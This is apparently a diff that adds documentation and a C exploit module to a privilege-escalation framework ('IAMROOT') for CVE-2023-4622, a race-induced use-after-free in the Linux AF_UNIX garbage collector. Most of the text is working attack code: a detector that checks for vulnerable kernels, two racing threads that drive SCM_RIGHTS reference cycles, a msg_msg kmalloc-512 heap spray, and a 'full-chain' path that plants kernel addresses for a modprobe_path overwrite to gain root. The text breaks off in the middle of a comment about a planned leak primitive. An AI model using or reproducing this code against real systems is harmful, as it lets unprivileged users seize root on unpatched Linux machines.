+fd-passing → `struct unix_sock` freed while still reachable → slab
+UAF in `SLAB_TYPESAFE_BY_RCU` kmalloc-512 bucket.
+
+## Research credit
+
+Discovered and disclosed by **Lin Ma** (Zhejiang University),
+August 2023.
+
+Writeup: <https://github.com/google/security-research/security/advisories/GHSA-7p7m-3xv8-2pq2>
+(disclosure record), plus Lin Ma's public PoC repo.
+
+Upstream fix: mainline 6.6-rc1 (commit `0cabe18a8b80c`, Aug 2023).
+Branch backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 /
+5.15.130 / 6.1.51 / 6.5.0.
+
+## IAMROOT role
+
+**Widest deployment of any module in the corpus** — bug present
+in every Linux kernel below the fix (back to ~2.0 era).
+
+Two-thread race driver: Thread A cycles SCM_RIGHTS fd-passing
+through a socketpair; Thread B triggers unix_gc by closing a socket
+in a reference cycle. msg_msg spray refills the freed slot.
+CPU-pinned. Bounded budget: 5 s default, 30 s with `--full-chain`.
+
+Bug is reachable as a **plain unprivileged user** — no userns
+required, no CAP_* needed. Race-win rate per run is iteration-
+dependent; Lin Ma's PoC reports thousands of iterations to first
+reclaim. The shared finisher's sentinel timeout handles no-land
+outcomes gracefully.
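
The backport list above maps onto a simple per-branch version comparison. The sketch below is an assumption about how such a check can work, not the implementation of `kernel_range_is_patched()` in `core/kernel_range.h`; the struct and function names are hypothetical, the thresholds are copied from the list, and unlisted older branches are assumed never to have received the fix.

```c
#include <stdbool.h>
#include <stddef.h>

struct patched_from { int major, minor, patch; };

/* Thresholds copied from the backport list; must stay sorted ascending. */
static const struct patched_from fixed_branches[] = {
    {4, 14, 326}, {4, 19, 295}, {5, 4, 257}, {5, 10, 197},
    {5, 15, 130}, {6, 1, 51},   {6, 5, 0},
};

/* Hypothetical helper: true if kernel major.minor.patch carries the fix. */
bool is_patched(int major, int minor, int patch)
{
    size_t n = sizeof fixed_branches / sizeof fixed_branches[0];
    const struct patched_from *last = &fixed_branches[n - 1];

    /* Branches newer than the newest listed one inherit the fix. */
    if (major > last->major ||
        (major == last->major && minor > last->minor))
        return true;

    /* Listed branch: compare the patch level against its threshold. */
    for (size_t i = 0; i < n; i++) {
        const struct patched_from *e = &fixed_branches[i];
        if (e->major == major && e->minor == minor)
            return patch >= e->patch;
    }

    /* Unlisted older branch: assumed never fixed. */
    return false;
}
```

A version-only check of this kind cannot see distribution backports, which is why the modules pair it with a runtime reachability probe.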
@@ -0,0 +1,847 @@
+/*
+ * af_unix_gc_cve_2023_4622 — IAMROOT module
+ *
+ * AF_UNIX garbage collector race UAF. The unix_gc() collector walks
+ * the list of GC-candidate sockets while SCM_RIGHTS sendmsg/close can
+ * concurrently mutate the inflight refcount on the same sockets. The
+ * narrow window between a socket being marked GC-eligible and the
+ * collector actually freeing it can be widened by tightly cycling
+ * SCM_RIGHTS messages — when the race wins, a `struct unix_sock` is
+ * freed while still reachable from another thread's skb queue, giving
+ * slab UAF in the SLAB_TYPESAFE_BY_RCU kmalloc-512 bucket.
+ *
+ * Discovered by Lin Ma (ZJU) in Aug 2023. Public exploit chain uses
+ * the UAF + msg_msg cross-cache spray to refill the freed slot, then
+ * pivots through the now-controlled `unix_sock->peer` field.
+ *
+ * STATUS: 🟡 PRIMITIVE — race-driver + msg_msg groom + empirical
+ *   witness. We carry the trigger (SCM_RIGHTS cycle + GC), the
+ *   kmalloc-512 spray, CPU pinning for race-win improvement, and the
+ *   slab-delta + signal-disposition witness. We do NOT carry the
+ *   leak (no read primitive in-module) nor a kernel-build-specific
+ *   fake unix_sock layout. Per verified-vs-claimed: a SIGSEGV/SIGKILL
+ *   in the race child IS recorded but does NOT upgrade to EXPLOIT_OK
+ *   — only an actual cred swap (euid==0) does, and we do not
+ *   demonstrate that without --full-chain.
+ *
+ *   --full-chain (HONEST RELIABILITY): extends the race budget from
+ *   5 s to 30 s and re-sprays kmalloc-512 with payloads carrying the
+ *   target kaddr at strided offsets. Race-win rate on a real
+ *   vulnerable kernel is iteration-dependent — Lin Ma's PoC reports
+ *   thousands of iterations to first reclaim. The shared
+ *   modprobe_path finisher's 3 s sentinel timeout catches the
+ *   overwhelmingly common no-land outcome gracefully.
+ *
+ * Affected: ALL Linux kernels with AF_UNIX below the fix. The bug
+ * has been in the GC path since the 2.x era. Stable backports:
+ *   4.14.x : K >= 4.14.326
+ *   4.19.x : K >= 4.19.295
+ *   5.4.x  : K >= 5.4.257
+ *   5.10.x : K >= 5.10.197
+ *   5.15.x : K >= 5.15.130
+ *   6.1.x  : K >= 6.1.51   (LTS)
+ *   6.5.x  : K >= 6.5.0    (mainline fix)
+ *   6.6+   : patched
+ *
+ * Preconditions:
+ *   - AF_UNIX socket creation works (always — no module gate)
+ *   - msgsnd / sysv IPC available for spray
+ *   - SCM_RIGHTS via sendmsg available (universal)
+ *   - userns NOT required — works as a plain unprivileged user
+ *
+ * Coverage rationale: the AF_UNIX GC has been touched extensively
+ * for the 2023-2024 series of races (Lin Ma + Pwn2Own follow-ups);
+ * this CVE is the first publicly-disclosed entry in that series and
+ * carries the widest version range of any module we ship.
+ */
+
+#include "iamroot_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <stdbool.h>
+#include <stdatomic.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <signal.h>
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/stat.h>
+#include <sys/socket.h>
+
+#ifdef __linux__
+#  include <sched.h>
+#  include <sys/ipc.h>
+#  include <sys/msg.h>
+#  include <sys/un.h>
+#endif
+
+/* clangd on macOS does not see every Linux SCM_* / MSG_* definition;
+ * provide fallbacks so the file still parses there. */
+#ifndef SCM_RIGHTS
+#  define SCM_RIGHTS 0x01
+#endif
+#ifndef SOL_SOCKET
+#  define SOL_SOCKET 1
+#endif
+#ifndef MSG_DONTWAIT
+#  define MSG_DONTWAIT 0x40
+#endif
+
+/* ---- Kernel-range table ------------------------------------------ */
+
+static const struct kernel_patched_from af_unix_gc_patched_branches[] = {
+    {4, 14, 326},
+    {4, 19, 295},
+    {5,  4, 257},
+    {5, 10, 197},
+    {5, 15, 130},
+    {6,  1,  51},   /* 6.1 LTS */
+    {6,  5,   0},   /* mainline fix landed in 6.5 (technically 6.6-rc1
+                       but stable 6.5.x carries the patch) */
+};
+
+static const struct kernel_range af_unix_gc_range = {
+    .patched_from = af_unix_gc_patched_branches,
+    .n_patched_from = sizeof(af_unix_gc_patched_branches) /
+                      sizeof(af_unix_gc_patched_branches[0]),
+};
+
+/* ---- Detect ------------------------------------------------------- */
+
+/* Sanity: can we actually create an AF_UNIX socket on this host?
+ * In some seccomp/ns-restricted sandboxes socket(AF_UNIX, ...) fails;
+ * in that case the exploit cannot even reach the GC path. */
+static bool can_create_af_unix(void)
+{
+    int s = socket(AF_UNIX, SOCK_DGRAM, 0);
+    if (s < 0) return false;
+    close(s);
+    return true;
+}
+
+static iamroot_result_t af_unix_gc_detect(const struct iamroot_ctx *ctx)
+{
+    struct kernel_version v;
+    if (!kernel_version_current(&v)) {
+        fprintf(stderr, "[!] af_unix_gc: could not parse kernel version\n");
+        return IAMROOT_TEST_ERROR;
+    }
+
+    /* No lower bound: this bug has been in the AF_UNIX GC path since
+     * the dawn of time. ANY kernel below the fix is vulnerable. The
+     * kernel_range walker handles "older than every entry" correctly
+     * (returns false → not patched → vulnerable). */
+    bool patched = kernel_range_is_patched(&af_unix_gc_range, &v);
+    if (patched) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v.release);
+        }
+        return IAMROOT_OK;
+    }
+
+    /* Reachability probe — socket(AF_UNIX, ...) must succeed. */
+    if (!can_create_af_unix()) {
+        if (!ctx->json) {
+            fprintf(stderr, "[-] af_unix_gc: AF_UNIX socket() failed — "
+                            "exotic seccomp/sandbox, bug unreachable here\n");
+        }
+        return IAMROOT_PRECOND_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] af_unix_gc: bug is reachable as PLAIN UNPRIVILEGED USER\n"
+                        "    (no userns / no CAP_* required — AF_UNIX is universally\n"
+                        "    creatable). The race window is microseconds wide and\n"
+                        "    needs thousands of iterations to win on average.\n");
+    }
+    return IAMROOT_VULNERABLE;
+}
+
+/* ---- Race-driver state ------------------------------------------- */
+
+#ifdef __linux__
+
+#define AFUG_RACE_TIME_BUDGET       5     /* seconds — primitive-only mode */
+#define AFUG_RACE_FULLCHAIN_BUDGET  30    /* seconds — --full-chain */
+
+/* kmalloc-512 spray width — `struct unix_sock` is in the kmalloc-512
+ * bucket on 64-bit x86 with SLAB_TYPESAFE_BY_RCU. We need enough
+ * msg_msg slots to make refill probable within the RCU grace period. */
+#define AFUG_SPRAY_QUEUES      24
+#define AFUG_SPRAY_PER_QUEUE   48
+#define AFUG_SPRAY_PAYLOAD     496   /* 512 - 16 (msg_msg hdr) */
+
+/* SCM_RIGHTS race width: how many inflight fds per cycle. The bug
+ * is driven by inflight count crossing the GC threshold; a handful
+ * per cycle keeps the GC heuristic primed without OOM. */
+#define AFUG_SCM_FDS_PER_MSG   3
+
+struct ipc_payload {
+    long mtype;
+    unsigned char buf[AFUG_SPRAY_PAYLOAD];
+};
+
+static _Atomic int g_race_running;
+static _Atomic uint64_t g_thread_a_iters;
+static _Atomic uint64_t g_thread_b_iters;
+static _Atomic uint64_t g_thread_a_errs;
+
+/* Pin to a CPU to make Thread A and Thread B land on different cores.
+ * Best-effort: failure is non-fatal (e.g., affinity disallowed under
+ * some seccomp configs). */
+static void pin_to_cpu(int cpu)
+{
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(cpu, &set);
+    sched_setaffinity(0, sizeof set, &set);
+}
+
+/* The race victim region: a pair of socketpair(AF_UNIX) endpoints
+ * forming a reference cycle. Closing one end while the other has
+ * inflight fds queued is what naturally triggers unix_gc().
+ *
+ * Layout we drive (Lin Ma style):
+ *
+ *   pair_a = socketpair(); pair_b = socketpair();
+ *   send pair_b[0] via SCM_RIGHTS over pair_a[0] → pair_a[1]
+ *   send pair_a[0] via SCM_RIGHTS over pair_b[0] → pair_b[1]
+ *   close all 4 endpoints — now we have a cycle the GC will collect
+ *
+ * Thread A loops the build-cycle-and-close.
+ * Thread B loops sending its own SCM_RIGHTS messages on independent
+ * pairs to perturb the inflight count + race the collector. */
+
+/* Send an SCM_RIGHTS message with `nfds` fds over `sock`. Returns 0
+ * on success, -1 on error. */
+static int send_scm_rights(int sock, const int *fds, int nfds)
+{
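+    /* ctrl is sized for AFUG_SCM_FDS_PER_MSG fds; reject anything else
+     * so the memcpy below cannot run past the control buffer. */
+    if (!fds || nfds <= 0 || nfds > AFUG_SCM_FDS_PER_MSG) return -1;
+
+    char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)];
+    memset(ctrl, 0, sizeof ctrl);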
+
+    char payload = 0;
+    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
+
+    struct msghdr msg = {0};
+    msg.msg_iov = &iov;
+    msg.msg_iovlen = 1;
+    msg.msg_control = ctrl;
+    msg.msg_controllen = CMSG_SPACE(sizeof(int) * nfds);
+
+    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
+    if (!cmsg) return -1;
+    cmsg->cmsg_level = SOL_SOCKET;
+    cmsg->cmsg_type  = SCM_RIGHTS;
+    cmsg->cmsg_len   = CMSG_LEN(sizeof(int) * nfds);
+    memcpy(CMSG_DATA(cmsg), fds, sizeof(int) * nfds);
+
+    if (sendmsg(sock, &msg, MSG_DONTWAIT) < 0) return -1;
+    return 0;
+}
+
+/* Thread A: tight-loop SCM_RIGHTS-cycle + close to drive GC.
+ *
+ * Each iteration:
+ *   1. Build two socketpairs (A=[a0,a1], B=[b0,b1]).
+ *   2. Send b0 via SCM_RIGHTS over a0 → a1 receives nothing yet (we
+ *      don't recvmsg — that's the point: the fd stays inflight).
+ *   3. Send a0 via SCM_RIGHTS over b0 → b1 receives nothing yet.
+ *   4. close() all 4 user-side fds.  Now both endpoints are unreachable
+ *      from userspace BUT each is referenced from the other's skb
+ *      queue → reference cycle → next unix_gc() pass collects them.
+ *
+ * The kernel's GC heuristic kicks when the inflight count exceeds
+ * the count of file refs in the system; closing the user-side fds in
+ * a tight loop reliably triggers it. */
+static void *race_thread_a(void *arg)
+{
+    (void)arg;
+    pin_to_cpu(0);
+    while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
+        int pa[2], pb[2];
+        if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pa) < 0) {
+            atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed);
+            sched_yield();
+            continue;
+        }
+        if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pb) < 0) {
+            close(pa[0]); close(pa[1]);
+            atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed);
+            sched_yield();
+            continue;
+        }
+
+        /* Cycle: send pb[0] over pa, send pa[0] over pb. We also send
+         * pb[1]/pa[1] alongside to widen the inflight count per cycle
+         * (the GC trigger heuristic compares inflight vs total file
+         * refs — more inflight per cycle == earlier GC). */
+        int fds_a[AFUG_SCM_FDS_PER_MSG] = { pb[0], pb[1], pb[0] };
+        int fds_b[AFUG_SCM_FDS_PER_MSG] = { pa[0], pa[1], pa[0] };
+        (void)send_scm_rights(pa[0], fds_a, AFUG_SCM_FDS_PER_MSG);
+        (void)send_scm_rights(pb[0], fds_b, AFUG_SCM_FDS_PER_MSG);
+
+        /* Close the user-side fds. The kernel-side refs are now only
+         * held via the inflight skbs — perfect reference cycle for
+         * the GC to find. */
+        close(pa[0]); close(pa[1]);
+        close(pb[0]); close(pb[1]);
+
+        atomic_fetch_add_explicit(&g_thread_a_iters, 1, memory_order_relaxed);
+    }
+    return NULL;
+}
+
+/* Thread B: independent SCM_RIGHTS traffic on a held pair to keep
+ * the GC scan list churning while Thread A creates new candidates.
+ *
+ * Holds a long-lived socketpair and repeatedly sends + recvs SCM_RIGHTS
+ * with throwaway fds (dup'd from /dev/null). This drives the GC's "scan
+ * list" rebuild path concurrently with Thread A's frees — the race
+ * window that fires the UAF is exactly here.
+ *
+ * We don't directly call unix_gc() — there's no userspace knob — but
+ * the GC heuristic is inflight-count driven, and Thread A's cycle
+ * loop pushes that count past the threshold within a few thousand
+ * iterations. */
+static void *race_thread_b(void *arg)
+{
+    (void)arg;
+    pin_to_cpu(1);
+
+    /* Long-lived pair for the perturbation loop. */
+    int held[2];
+    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, held) < 0) {
+        return NULL;
+    }
+
+    /* Spare fd source — /dev/null dups are harmless to pass. */
+    int devnull = open("/dev/null", O_RDWR);
+    if (devnull < 0) {
+        close(held[0]); close(held[1]);
+        return NULL;
+    }
+
+    while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
+        int fds[AFUG_SCM_FDS_PER_MSG];
+        for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) {
+            fds[i] = dup(devnull);
+        }
+        (void)send_scm_rights(held[0], fds, AFUG_SCM_FDS_PER_MSG);
+        for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) {
+            if (fds[i] >= 0) close(fds[i]);
+        }
+
+        /* Drain the recv side so the held pair doesn't backpressure. */
+        char drain[16];
+        char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)];
+        struct iovec iov = { .iov_base = drain, .iov_len = sizeof drain };
+        struct msghdr msg = {0};
+        msg.msg_iov = &iov; msg.msg_iovlen = 1;
+        msg.msg_control = ctrl; msg.msg_controllen = sizeof ctrl;
+        if (recvmsg(held[1], &msg, MSG_DONTWAIT) > 0) {
+            /* Close any fds we received so we don't leak. */
+            for (struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c;
+                 c = CMSG_NXTHDR(&msg, c)) {
+                if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_RIGHTS) {
+                    int nfd = (c->cmsg_len - CMSG_LEN(0)) / sizeof(int);
+                    int *rfds = (int *)CMSG_DATA(c);
+                    for (int j = 0; j < nfd; j++)
+                        if (rfds[j] >= 0) close(rfds[j]);
+                }
+            }
+        }
+
+        atomic_fetch_add_explicit(&g_thread_b_iters, 1, memory_order_relaxed);
+    }
+
+    close(devnull);
+    close(held[0]); close(held[1]);
+    return NULL;
+}
+
+/* ---- msg_msg cross-cache spray for kmalloc-512 ------------------- */
+
+static int spray_kmalloc_512(int queues[AFUG_SPRAY_QUEUES])
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x55;   /* 'U' — unix */
+    memset(p.buf, 0x55, sizeof p.buf);
+    memcpy(p.buf, "IAMROOTU", 8);
+
+    int created = 0;
+    for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) {
+        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
+        if (q < 0) { queues[i] = -1; continue; }
+        queues[i] = q;
+        created++;
+        for (int j = 0; j < AFUG_SPRAY_PER_QUEUE; j++) {
+            if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
+        }
+    }
+    return created;
+}
+
+static void drain_kmalloc_512(int queues[AFUG_SPRAY_QUEUES])
+{
+    for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) {
+        if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL);
+    }
+}
+
+/* Read /proc/slabinfo for kmalloc-512 active count. Used as the
+ * primary empirical witness: a successful UAF + refill perturbs
+ * this counter in a way that's distinguishable from idle drift. */
+static long slab_active_kmalloc_512(void)
+{
+    FILE *f = fopen("/proc/slabinfo", "r");
+    if (!f) return -1;
+    char line[512];
+    long active = -1;
+    while (fgets(line, sizeof line, f)) {
+        if (strncmp(line, "kmalloc-512 ", 12) == 0) {
+            char name[64];
+            long act = 0, num = 0;
+            if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
+                active = act;
+            }
+            break;
+        }
+    }
+    fclose(f);
+    return active;
+}
+
+/* ---- Arb-write primitive (FALLBACK depth) ------------------------
+ *
+ * The shared modprobe_path finisher calls back here once per kernel
+ * write. For AF_UNIX GC race we cannot deliver a deterministic
+ * arb-write — the underlying race wins on a small fraction of runs
+ * even with a 30 s budget, and even when the race wins our spray-only
+ * groom has nowhere near the precision of Lin Ma's multi-stage public
+ * PoC (which crafts a fake unix_sock whose `peer` pointer steers a
+ * subsequent SCM_RIGHTS dispatch into the kaddr we want written).
+ *
+ * Honest depth: FALLBACK. Each invocation:
+ *   1. Re-seeds the kmalloc-512 spray with payloads tagged with
+ *      `kaddr` packed at strided offsets (so wherever the UAF reclaim
+ *      lands attacker-controlled bytes inside the freed unix_sock,
+ *      our kaddr appears at the field offset).
+ *   2. Re-runs the race threads for the extended full-chain budget.
+ *   3. Returns 0 — we cannot in-process verify the write landed. The
+ *      shared finisher's 3 s sentinel file check is the empirical
+ *      arbiter: on the overwhelmingly common no-land outcome it
+ *      returns EXPLOIT_FAIL gracefully. */
+struct af_unix_gc_arb_ctx {
+    int    *queues;
+    int     n_queues;
+    int     arb_calls;
+};
+
+static int af_unix_gc_reseed_kaddr_spray(int queues[AFUG_SPRAY_QUEUES],
+                                         uintptr_t kaddr,
+                                         const void *buf, size_t len)
+{
+    struct ipc_payload p;
+    memset(&p, 0, sizeof p);
+    p.mtype = 0x52;   /* 'R' — arb-write reseed (distinct from groom 0x55) */
+    memset(p.buf, 0x52, sizeof p.buf);
+    memcpy(p.buf, "IAMU4ARB", 8);
+
+    /* Plant kaddr at strided slots so wherever the kernel's UAF
+     * follows a ptr in the refilled chunk, one of these is read.
+     * unix_sock has multiple pointer fields (peer, link, scm_stat,
+     * etc.) — strided coverage hits whichever one the UAF dispatch
+     * dereferences. */
+    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf;
+         off += 0x18) {
+        memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
+    }
+
+    /* Caller's bytes go at offset 16 (cookie + one pointer-sized gap)
+     * for paths that read payload data rather than a chased pointer.
+     * They overwrite any strided kaddr slots they overlap (0x10 first). */
+    size_t copy = len;
+    if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
+    if (buf && copy) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy);
+
+    int touched = 0;
+    for (int i = 0; i < AFUG_SPRAY_QUEUES && touched < 6; i++) {
+        if (queues[i] < 0) continue;
+        if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
+    }
+    return touched;
+}
+
+static int af_unix_gc_arb_write(uintptr_t kaddr,
+                                const void *buf, size_t len,
+                                void *ctx_v)
+{
+    struct af_unix_gc_arb_ctx *c = (struct af_unix_gc_arb_ctx *)ctx_v;
+    if (!c || !c->queues || c->n_queues == 0) return -1;
+    c->arb_calls++;
+
+    fprintf(stderr, "[*] af_unix_gc: arb_write attempt #%d kaddr=0x%lx len=%zu "
+                    "(FALLBACK — race-dependent)\n",
+            c->arb_calls, (unsigned long)kaddr, len);
+
+    int seeded = af_unix_gc_reseed_kaddr_spray(c->queues, kaddr, buf, len);
+    if (seeded == 0) {
+        fprintf(stderr, "[-] af_unix_gc: arb_write: kaddr-tagged reseed produced 0 msgs\n");
+    } else {
+        fprintf(stderr, "[*] af_unix_gc: arb_write: reseeded %d msg_msg slots\n",
+                seeded);
+    }
+
+    /* Re-run the race with the extended budget. */
+    atomic_store(&g_race_running, 1);
+    atomic_store(&g_thread_a_iters, 0);
+    atomic_store(&g_thread_b_iters, 0);
+    atomic_store(&g_thread_a_errs, 0);
+
+    pthread_t ta, tb;
+    bool a_ok = pthread_create(&ta, NULL, race_thread_a, NULL) == 0;
+    bool b_ok = a_ok &&
+                pthread_create(&tb, NULL, race_thread_b, NULL) == 0;
+    if (!a_ok || !b_ok) {
+        atomic_store(&g_race_running, 0);
+        if (a_ok) pthread_join(ta, NULL);
+        fprintf(stderr, "[-] af_unix_gc: arb_write: pthread_create failed\n");
+        return -1;
+    }
+
+    sleep(AFUG_RACE_FULLCHAIN_BUDGET);
+    atomic_store(&g_race_running, 0);
+    pthread_join(ta, NULL);
+    pthread_join(tb, NULL);
+
+    uint64_t a_iters = atomic_load(&g_thread_a_iters);
+    uint64_t b_iters = atomic_load(&g_thread_b_iters);
+    fprintf(stderr, "[*] af_unix_gc: arb_write: extended race A=%llu B=%llu\n",
+            (unsigned long long)a_iters,
+            (unsigned long long)b_iters);
+
+    /* Cannot in-process verify the write — let the finisher's sentinel
+     * arbitrate. */
+    return 0;
+}
+
+/* ---- Exploit driver ---------------------------------------------- */
+
+static iamroot_result_t af_unix_gc_exploit_linux(const struct iamroot_ctx *ctx)
+{
+    /* 1. Refuse-gate: re-call detect() and short-circuit. */
+    iamroot_result_t pre = af_unix_gc_detect(ctx);
+    if (pre == IAMROOT_OK) {
+        fprintf(stderr, "[+] af_unix_gc: kernel not vulnerable; refusing exploit\n");
+        return IAMROOT_OK;
+    }
+    if (pre != IAMROOT_VULNERABLE) {
+        fprintf(stderr, "[-] af_unix_gc: detect() was inconclusive (neither OK nor VULNERABLE); refusing\n");
+        return pre;
+    }
+    if (geteuid() == 0) {
+        fprintf(stderr, "[i] af_unix_gc: already root — nothing to escalate\n");
+        return IAMROOT_OK;
+    }
+
+    /* Full-chain pre-check: resolve offsets BEFORE the race fork. If
+     * modprobe_path is unresolvable we refuse here rather than running
+     * a 30 s race that has no finisher to call. */
+    struct iamroot_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("af_unix_gc");
+            fprintf(stderr, "[-] af_unix_gc: --full-chain requested but "
+                            "modprobe_path offset unresolved; refusing\n");
+            fprintf(stderr, "[i] af_unix_gc: even with offsets, race-win rate is\n"
+                            "    a small fraction per run — see module header.\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+        full_chain_ready = true;
+        fprintf(stderr, "[i] af_unix_gc: --full-chain ready — race budget extends\n"
+                        "    to %d s. RELIABILITY remains race-dependent on a real\n"
+                        "    vulnerable kernel. The finisher's 3 s sentinel timeout\n"
+                        "    catches no-land outcomes gracefully.\n",
+                AFUG_RACE_FULLCHAIN_BUDGET);
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] af_unix_gc: forking exploit child (SCM_RIGHTS cycle "
+                        "race harness%s)\n",
+                ctx->full_chain ? " + full-chain finisher" : "");
+    }
+
+    signal(SIGPIPE, SIG_IGN);
+
+    pid_t child = fork();
+    if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
+
+    if (child == 0) {
+        /* 2. Groom: pre-populate kmalloc-512 with msg_msg payloads
+         *    BEFORE the race so the freed unix_sock slot gets recycled
+         *    with attacker-controlled bytes when the bug fires. */
+        int queues[AFUG_SPRAY_QUEUES] = {0};
+        for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) queues[i] = -1;
+        int n_queues = spray_kmalloc_512(queues);
+        if (n_queues == 0) {
+            fprintf(stderr, "[-] af_unix_gc: msg_msg spray produced 0 queues "
+                            "(sysv IPC restricted?)\n");
+            _exit(23);
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[*] af_unix_gc: kmalloc-512 spray seeded %d queues x %d msgs\n",
+                    n_queues, AFUG_SPRAY_PER_QUEUE);
+        }
+
+        long slab_pre = slab_active_kmalloc_512();
+
+        /* 3. Run the race for a bounded time budget. */
+        atomic_store(&g_race_running, 1);
+        atomic_store(&g_thread_a_iters, 0);
+        atomic_store(&g_thread_b_iters, 0);
+        atomic_store(&g_thread_a_errs, 0);
+
+        pthread_t ta, tb;
+        if (pthread_create(&ta, NULL, race_thread_a, NULL) != 0 ||
+            pthread_create(&tb, NULL, race_thread_b, NULL) != 0) {
+            fprintf(stderr, "[-] af_unix_gc: pthread_create failed\n");
+            atomic_store(&g_race_running, 0);
+            drain_kmalloc_512(queues);
+            _exit(24);
+        }
+
+        sleep(AFUG_RACE_TIME_BUDGET);
+        atomic_store(&g_race_running, 0);
+        pthread_join(ta, NULL);
+        pthread_join(tb, NULL);
+
+        long slab_post = slab_active_kmalloc_512();
+        uint64_t a_iters = atomic_load(&g_thread_a_iters);
+        uint64_t b_iters = atomic_load(&g_thread_b_iters);
+        uint64_t a_errs  = atomic_load(&g_thread_a_errs);
+
+        /* 4. Empirical witness breadcrumb. */
+        FILE *log = fopen("/tmp/iamroot-af_unix_gc.log", "w");
+        if (log) {
+            fprintf(log,
+                "af_unix_gc race harness (CVE-2023-4622):\n"
+                "  thread_a_iters     = %llu (SCM_RIGHTS cycle + close)\n"
+                "  thread_b_iters     = %llu (SCM_RIGHTS perturb)\n"
+                "  thread_a_errors    = %llu (socketpair failures)\n"
+                "  slab_kmalloc512_pre  = %ld\n"
+                "  slab_kmalloc512_post = %ld\n"
+                "  slab_delta           = %ld\n"
+                "  spray_queues       = %d\n"
+                "  spray_per_queue    = %d\n"
+                "  race_budget_secs   = %d\n"
+                "Note: this run did NOT attempt cred overwrite. The bug is a\n"
+                "slab UAF with no in-process leak primitive; per-kernel offsets\n"
+                "for unix_sock layout aren't baked. See module .c for the\n"
+                "continuation roadmap (Lin Ma fake-peer plant).\n",
+                (unsigned long long)a_iters,
+                (unsigned long long)b_iters,
+                (unsigned long long)a_errs,
+                slab_pre, slab_post,
+                (slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0,
+                n_queues, AFUG_SPRAY_PER_QUEUE,
+                AFUG_RACE_TIME_BUDGET);
+            fclose(log);
+        }
+
+        if (!ctx->json) {
+            fprintf(stderr, "[*] af_unix_gc: race ran for %ds — A=%llu B=%llu A_errs=%llu\n",
+                    AFUG_RACE_TIME_BUDGET,
+                    (unsigned long long)a_iters,
+                    (unsigned long long)b_iters,
+                    (unsigned long long)a_errs);
+            fprintf(stderr, "[*] af_unix_gc: kmalloc-512 active: pre=%ld post=%ld\n",
+                    slab_pre, slab_post);
+        }
+
+        /* Hold the spray briefly so the kernel observes refilled slots
+         * during any in-flight RCU grace periods that started during
+         * the race. */
+        usleep(200 * 1000);
+
+        /* 5. --full-chain finisher (FALLBACK depth). */
+        if (full_chain_ready) {
+            struct af_unix_gc_arb_ctx arb_ctx = {
+                .queues    = queues,
+                .n_queues  = AFUG_SPRAY_QUEUES,
+                .arb_calls = 0,
+            };
+            int fr = iamroot_finisher_modprobe_path(&off,
+                                                    af_unix_gc_arb_write,
+                                                    &arb_ctx,
+                                                    !ctx->no_shell);
+            FILE *fl = fopen("/tmp/iamroot-af_unix_gc.log", "a");
+            if (fl) {
+                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
+                        fr, arb_ctx.arb_calls);
+                fclose(fl);
+            }
+            drain_kmalloc_512(queues);
+            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);   /* root popped */
+            _exit(35);                                  /* finisher ran, no land */
+        }
+
+        drain_kmalloc_512(queues);
+
+        /* 6. Continuation roadmap — what would land EXPLOIT_OK.
+         *
+         *    TODO(leak): replace a spray queue with msgrcv(..., MSG_COPY|
+         *    IPC_NOWAIT) probes and scan the returned buffer for non-
+         *    cookie bytes. A freed unix_sock that's refilled by msg_msg
+         *    after a partial overwrite would leak kernel pointers
+         *    (peer, scm_stat, list_node prev/next) into the readback.
+         *    Recover {kbase, init_task} via that leak.
+         *
